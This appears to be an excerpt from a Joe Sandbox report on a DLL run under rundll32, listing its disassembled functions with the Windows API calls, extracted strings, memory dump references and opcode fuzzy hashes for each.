Uniqueness Score: -1.00%

Function 1002B84C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 1002B878
lstrlenA.KERNEL32(?), ref: 1002B8C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002B8DD
_wcslen.LIBCMT ref: 1002B901

Strings

System, xrefs: 1002B874

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
String ID: System
API String ID: 4253822919-3470857405
Opcode ID: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
Instruction ID: 7b5a175680f670ca79b6c2ec9272e95e82f354ff2106dbd97111df154043a3f4
Opcode Fuzzy Hash: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
Instruction Fuzzy Hash: C8412671D00619DFDB14CFA4DC85AAEBBB9FF04310F64812AE516EB285E770AD85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100270BC, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 100270EF
PeekMessageA.USER32 ref: 10027113
UpdateWindow.USER32(?), ref: 1002712E
SendMessageA.USER32(?,00000121,00000000,?), ref: 1002714F
SendMessageA.USER32(?,0000036A,00000000,00000002), ref: 10027167
UpdateWindow.USER32(?), ref: 100271AA
PeekMessageA.USER32 ref: 100271DB

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction ID: e439185c47b7e5e34c348b8e0b3dbe5bb3c4b57b45cec7e657144295835a6737
Opcode Fuzzy Hash: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction Fuzzy Hash: 9041C370E00246EBDB11CF69DC84E9FBBF8FF82B81F90815DE949A2150D7719A50DB10

Uniqueness

Uniqueness Score: -1.00%

Function 10027676, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10027705
SendMessageA.USER32(00000000,00000405,00000000,?), ref: 1002772E
GetWindowLongA.USER32 ref: 10027740
GetWindowLongA.USER32 ref: 10027751
SetWindowLongA.USER32(?,000000FC,?), ref: 1002776D

Strings

,, xrefs: 10027724

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction ID: f848ae84a4977e1a31b52bc52376e27e10e8709ed1b3efe9ee7841c93cdd6a05
Opcode Fuzzy Hash: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction Fuzzy Hash: 1431C134600B119FC715DF78E888A6AB7F5FF48350B92056DE58997691DB70E800CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002245E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10022468
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1002254E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002256B
RegCloseKey.ADVAPI32(?), ref: 1002258B
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100225A6

Strings

Software\, xrefs: 100224CC

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
Instruction ID: 3764a028f082780bf1b34d3e1a3aecc110f1b9c57831791e493d608046546682
Opcode Fuzzy Hash: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
Instruction Fuzzy Hash: 3C41AC35800128EBCB22DBA0CC81AEEB3B8FF49310F5045D9F249E2191DB34AB958F94

Uniqueness

Uniqueness Score: -1.00%

Function 100222E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 100222EA
RegOpenKeyA.ADVAPI32(?,?,?), ref: 10022378
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002239B

Part of subcall function 1002228B: __EH_prolog3.LIBCMT ref: 10022292

Strings

Software\Classes\, xrefs: 1002232B

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
Instruction ID: 704202dc6e21b2fa8b48efa6eea704b7fc6a1643c8ca87a9ade3220d51c06aab
Opcode Fuzzy Hash: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
Instruction Fuzzy Hash: A1317C36C00068EBDB22EBA4CD44BDDB6B8FB09350F5141D5F999A3252DA306FA49F91

Uniqueness

Uniqueness Score: -1.00%

Function 1002B26C, Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 1002B279
SendMessageA.USER32(?,00000365,00000000,00000000), ref: 1002B294
GetFocus.USER32 ref: 1002B2A9
SendMessageA.USER32(?,00000365,00000000,00000000), ref: 1002B2B7
GetLastActivePopup.USER32(?), ref: 1002B2E0
SendMessageA.USER32(?,00000365,00000000,00000000), ref: 1002B2ED

Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852

SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 1002B313

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
String ID:
API String ID: 3338174999-0
Opcode ID: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction ID: 3a08670cfc868389e080b955865bcb0f045f405a5b874c30a2897e43bb08e3ed
Opcode Fuzzy Hash: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction Fuzzy Hash: 7F1146B590065AFFEB11DFA1DD8AC9E7E7CEF41788B910075F504A2121EB719F04AB20

Uniqueness

Uniqueness Score: -1.00%

Function 1002AAF8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1002AB28
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB4B
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB67
RegCloseKey.ADVAPI32(?), ref: 1002AB77
RegCloseKey.ADVAPI32(?), ref: 1002AB81

Strings

software, xrefs: 1002AB10

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
Instruction ID: fb36ca9c2f952ecb3db15ddf6cda8d32fba402c4719dfc4725c3bd37d29a496b
Opcode Fuzzy Hash: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
Instruction Fuzzy Hash: 6B11E672900158FBDB11DB9ADD88CDFBFBDEB8A750B5000AAF504A2122D7319E44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002B00C, Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?), ref: 1002B013
__CxxThrowException@8.LIBCMT ref: 1002B01D

Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002B034
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041

Part of subcall function 10023B23: __CxxThrowException@8.LIBCMT ref: 10023B39

_memset.LIBCMT ref: 1002B060
TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
Instruction ID: 36d3102e2cb30bc4552268f57227952f3745dc8c02fd82b3b9104c669509b869
Opcode Fuzzy Hash: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
Instruction Fuzzy Hash: DC115E74100605AFD725EF64DCC5D2BBBB9FF453107A0C529F969D6522CB30AC24CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1002A948, Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 1002A956
GetSysColor.USER32(00000010), ref: 1002A95D
GetSysColor.USER32(00000014), ref: 1002A964
GetSysColor.USER32(00000012), ref: 1002A96B
GetSysColor.USER32(00000006), ref: 1002A972
GetSysColorBrush.USER32(0000000F), ref: 1002A97F
GetSysColorBrush.USER32(00000006), ref: 1002A986

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
Instruction ID: 2de359d209fd3f7b37bcce9053ec3ec9da3e309d31870537ed148616a4e248d0
Opcode Fuzzy Hash: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
Instruction Fuzzy Hash: 0BF0FE719407445BD730BF724E49B47BAD1FFC4710F02092EE2458B990D6B6E441DF44

Uniqueness

Uniqueness Score: -1.00%

Function 10023266, Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 1002326D
GlobalLock.KERNEL32 ref: 10023345
CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
DestroyWindow.USER32(00000000,?,1000150C,00000000,04057276), ref: 100233EE
GlobalUnlock.KERNEL32(?,?,1000150C,00000000,04057276), ref: 100233FE
GlobalFree.KERNEL32 ref: 10023407

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction ID: 542586d5134ef99c8f61472b69a72313b72e87743f096b2e8f632b75dff3f323
Opcode Fuzzy Hash: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction Fuzzy Hash: DD519B31A0024AEFCB04DFA4E9859AEBBB5EF04350F95442DF506E7292CB70AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10021E9F, Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32 ref: 10021ED2
GetParent.USER32(00000000), ref: 10021EE0
GetParent.USER32(00000000), ref: 10021EF3
GetLastActivePopup.USER32(00000000), ref: 10021F04
IsWindowEnabled.USER32(00000000), ref: 10021F18
EnableWindow.USER32(00000000,00000000), ref: 10021F2B

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
Instruction ID: f929a2de190b898985c8684475384bdcb1a7d6cc0d17529594567964d95cf4f5
Opcode Fuzzy Hash: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
Instruction Fuzzy Hash: 7711E73B5012725BDBA2DA65AD80BDF32D8EFB5AE1F830165EC24E7204D730CD0142D5

Uniqueness

Uniqueness Score: -1.00%

Function 10037738, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 10037760

Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C

__getptd.LIBCMT ref: 1003776A

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 10037778
__getptd.LIBCMT ref: 10037786
__getptd.LIBCMT ref: 10037791
_CallCatchBlock2.LIBCMT ref: 100377B7

Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521

Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction ID: fb1f34f9027f5a0fd6fb665b034cbc12c1ee6665b85233a2d450c333db5c1a8f
Opcode Fuzzy Hash: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction Fuzzy Hash: 4F1104B9C04249EFDB01DFA4D945AEE7BB1FF08315F508469F814AB251DB38AA11DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002A8D2, Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 1002A8E3
GetDlgCtrlID.USER32(00000000), ref: 1002A8F7
GetWindowLongA.USER32 ref: 1002A907
GetWindowRect.USER32 ref: 1002A919
PtInRect.USER32(?,?,?), ref: 1002A929
GetWindow.USER32(?,00000005), ref: 1002A936

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
Instruction ID: abcb09268cf445b2c35b0e2b56c0cfd5e9caec1888beec0722017402bcd9ce52
Opcode Fuzzy Hash: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
Instruction Fuzzy Hash: FC018F32500126BBEB219F559D48EAF3BACFF463A1F414165FD15D6060DB30DA829A98

Uniqueness

Uniqueness Score: -1.00%

Function 10029F40, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10029F70

Strings

@, xrefs: 1002A07C
@, xrefs: 1002A115
AfxMDIFrame90s, xrefs: 1002A011
AfxFrameOrView90s, xrefs: 1002A036

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
API String ID: 2102423945-455206835
Opcode ID: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
Instruction ID: fa70bd333b2ddaae6f39455d5bc8e436e1dc58d3be4ecb045c2565641b92f197
Opcode Fuzzy Hash: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
Instruction Fuzzy Hash: BD914175C00219ABDB80CFA4D581BDEBBF9EF48384F518065F908E7181EB749B84DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001D60, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136windowCOMMON

Download Yara Rule

APIs

Part of subcall function 10022D72: _memset.LIBCMT ref: 10022D8E

_strlen.LIBCMT ref: 10001E7F
_strlen.LIBCMT ref: 10001EF1
_strlen.LIBCMT ref: 10001F36
LoadIconA.USER32 ref: 10001F81

Strings

127.0.0.1, xrefs: 10001E68, 10001E7A, 10001E8E

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: _strlen$IconLoad_memset
String ID: 127.0.0.1
API String ID: 858515944-3619153832
Opcode ID: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
Instruction ID: cb70d14c711791ee52ee588ee2f9325bb7e7fa3515ba92e26f588566a221a80e
Opcode Fuzzy Hash: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
Instruction Fuzzy Hash: AE5118B4904298DBDB14CFA4CC41B9EBBB1EF45308F6481A8E50DAB392DB356E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 10020982, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1002099A
_memset.LIBCMT ref: 10020A12
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10020A75
LoadBitmapA.USER32 ref: 10020A8D

Strings

, xrefs: 100209F3

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
